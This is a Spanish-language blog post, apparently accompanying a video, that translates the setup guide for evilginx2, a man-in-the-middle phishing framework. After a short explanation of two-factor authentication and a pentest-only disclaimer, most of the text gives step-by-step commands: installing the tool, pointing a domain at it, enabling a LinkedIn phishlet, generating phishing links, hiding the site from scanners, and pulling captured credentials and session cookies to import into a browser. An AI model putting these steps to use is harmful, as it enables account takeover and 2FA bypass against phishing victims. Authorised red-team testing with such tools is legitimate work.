Link de descarga
https://github.com/kgretzky/evilginx2ESTE VIDEO ES PARA PROPÓSITO EDUCATIVO SOLO HACKISON NO ES RESPONSABLE DE NINGUNA ACTIVIDAD ILEGAL.
==================================================
====
Soy muy
consciente de que Evilginx se puede utilizar para propósitos nefarios. Este
trabajo es simplemente una demostración de lo que pueden hacer los adeptos a
los atacantes. Es responsabilidad del defensor tomar en consideración dichos
ataques y encontrar formas de proteger a sus usuarios contra este tipo de
ataques de phishing. Evilginx se debe utilizar solo en tareas de pruebas de
penetración legítimas con permiso por escrito de las partes a las que se les
puede hacer phishing.
==================================================
====
¿QUÉ ES LA
AUTENTICACIÓN DE DOS FACTORES?
La
autenticación de dos factores (2FA), a veces conocida como verificación de dos
pasos o autenticación de doble factor, es un proceso de seguridad en el que el
usuario proporciona dos factores de autenticación diferentes para verificar su
identidad y proteger mejor las credenciales del usuario y los recursos que
puede proporcionar. acceso. La autenticación de dos factores proporciona un
nivel más alto de seguridad que los métodos de autenticación que dependen de la
autenticación de un solo factor (SFA), en la que el usuario proporciona solo un
factor: por lo general, una contraseña o un código de acceso. Los métodos de
autenticación de dos factores dependen de que los usuarios proporcionen una
contraseña y un segundo factor, generalmente un token de seguridad o un factor
biométrico como una huella dactilar o un escaneo facial.
==================================================
====
¿QUÉ ES
EVILGINX?
evilginx2 es
un marco de ataque de hombre en medio utilizado para las credenciales de inicio
de sesión de phishing junto con las cookies de sesión, que a su vez permite
eludir la protección de autenticación de 2 factores.
Esta
herramienta es la sucesora de Evilginx, lanzada en 2017, que usó una versión
personalizada del servidor HTTP nginx para proporcionar una funcionalidad de
hombre en el medio para actuar como un proxy entre un navegador y un sitio web
de phishing. La versión actual está completamente escrita en GO como una
aplicación independiente, que implementa sus propios servidores HTTP y DNS, lo
que hace que sea extremadamente fácil de configurar y usar.
==================================================
====
Puede
usar un paquetebinario precompilado para su arquitectura o puede compilar evilginx2
desde la fuente.
Necesitará
un servidor externo donde hospedará su instalación de evilginx2 . Personalmente
recomiendo Digital Ocean y si sigue mi enlace de referencia, obtendrá$ 10 adicionales para gastar en servidores de forma gratuita .
Evilginx
funciona muy bien en el VPS de Debian 8 más básico.
Instalación desde la fuente
Para
compilar desde la fuente, asegúrese de haber instalado GO de la versión
al menos 1.10.0 ( obténgala desde aquí
) y que la variable de entorno $GOPATH esté configurada correctamente (def. $HOME/go
).
Después
de la instalación, agregue esto a su ~/.profile , Asumiendo que instaló GO
en /usr/local/go :
export GOPATH=$HOME/go export
PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Luego
cárguelo con la source ~/.profiles .
Ahora
debería estar listo para instalar evilginx2 . Siga estas instrucciones:
sudo apt-get install git make go get -u
github.com/kgretzky/evilginx2 cd $GOPATH/src/github.com/kgretzky/evilginx2 make
Ahora
puede ejecutar evilginx2 desde el directorio local como:
sudo ./bin/evilginx -p ./phishlets/
O
instálalo globalmente:
sudo make install sudo evilginx
Las
instrucciones anteriores también se pueden usar para actualizar evilginx2
a la última versión.
Instalación con Docker
Puedes
lanzar evilginx2 desde Docker. Primero construye el contenedor:
docker build . -t evilginx2
A
continuación, puede ejecutar el contenedor:
docker run -it -p 53:53/udp -p 80:80 -p
443:443 evilginx2
Los
phishlets se cargan dentro del contenedor en /app/phishlets , que se pueden
montar como un volumen para la configuración.
Instalación desde paquetes binarios precompilados
Toma el
paquete que quieras desde aquí
y déjalo en tu caja. Entonces hazlo:
unzip <package_name>.zip -d
<package_name> cd <package_name>
Si desea
realizar una instalación en todo el sistema, use el script de instalación con
privilegios de raíz:
chmod 700 ./install.sh sudo ./install.sh sudo
evilginx
o
simplemente inicie evilginx2 desde el directorio actual (también
necesitará privilegios de root):
chmod 700 ./evilginx sudo ./evilginx
Uso
¡IMPORTANTE! Asegúrese de que no hay servicio
escuchando en los puertos TCP 443 , TCP 80 y UDP 53 . Es posible que deba
apagar apache o nginx y cualquier servicio utilizado para resolver el DNS que
se esté ejecutando. evilginx2 le dirá en el lanzamiento si no puede
abrir un socket de escucha en cualquiera de estos puertos.
Por
defecto, evilginx2 buscará phishlets en el directorio ./phishlets/ y más
adelante en /usr/share/evilginx/phishlets/ . Si desea especificar una ruta
personalizada para cargar phishlets, use el parámetro -p
<phishlets_dir_path> al iniciar la herramienta.
Usage of ./evilginx: -debug Enable debug
output -developer Enable developer mode (generates self-signed certificates for
all hostnames) -p string Phishlets directory path
Debería
ver el logotipo de evilginx2 con un mensaje para ingresar comandos. Escriba
help o help <command> si desea ver los comandos disponibles o información
más detallada sobre ellos.
Empezando
Para ponerse en marcha, primero debe hacer algo de configuración.En este punto, asumo que ya ha registrado un dominio (llamémoslo
yourdomain.com
) y configura
los servidores de nombres ( ns1
y ns2
) en el panel
de administración de su proveedor de dominio para que apunte a la IP de su
servidor (por ejemplo, 10.0.0.1 ): ns1.yourdomain.com = 10.0.0.1 ns2.yourdomain.com = 10.0.0.1
Configure el
dominio de su servidor y la IP usando los siguientes comandos: config domain yourdomain.com config ip 10.0.0.1
Ahora puedes
configurar el phishlet que quieras usar. Por el bien de esta breve
guía, usaremos un phishlet de LinkedIn. Configure el nombre de host
para el phishlet (obviamente debe contener su dominio): phishlets hostname linkedin my.phishing.hostname.yourdomain.com
Y ahora puede enable
el phishlet,
que iniciará la recuperación automática de los certificados LetsEncrypt SSL /
TLS si no se encuentra ninguno localmente para el nombre de host que eligió: phishlets enable linkedin
Su sitio de
phishing ahora está en vivo.
Piense
en la URL, desea que la víctima sea redirigida al iniciar sesión correctamente
y obtenga la URL de phishing como esta (la víctima será redirigida a https://www.google.com
): phishlets get-url linkedin https://www.google.com
La ejecución de
phishlets solo responderá a los enlaces con token, por lo que cualquier escáner
que escanee su dominio principal será redirigido a la URL especificada como redirect_url
en la config
. Si desea ocultar su phishlet
y hacer que no responda incluso a las URL de phishing en phishlet
hide/unhide <phishlet>
válidas, use
el phishlet hide/unhide <phishlet>
. Puede monitorear las credenciales capturadas y las cookies de sesión con:
sessions
Para obtener
información detallada sobre la sesión capturada, con la cookie de sesión en sí
(se imprimirá en formato JSON en la parte inferior), seleccione su ID de sesión: sessions <id>
La cookie de
sesión capturada se puede copiar e importar en el navegador Chrome, usando la
extensión EditThisCookie
. ¡Importante! Si desea que evilginx2 continúe ejecutándose después de cerrar sesión en su servidor, debe ejecutarlo dentro de una sesión de
screen
. Si desea obtener más información sobre esta técnica de phishing, ahi se tiene una extensa publicación sobre evilginx2:
https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
No hay comentarios.:
Publicar un comentario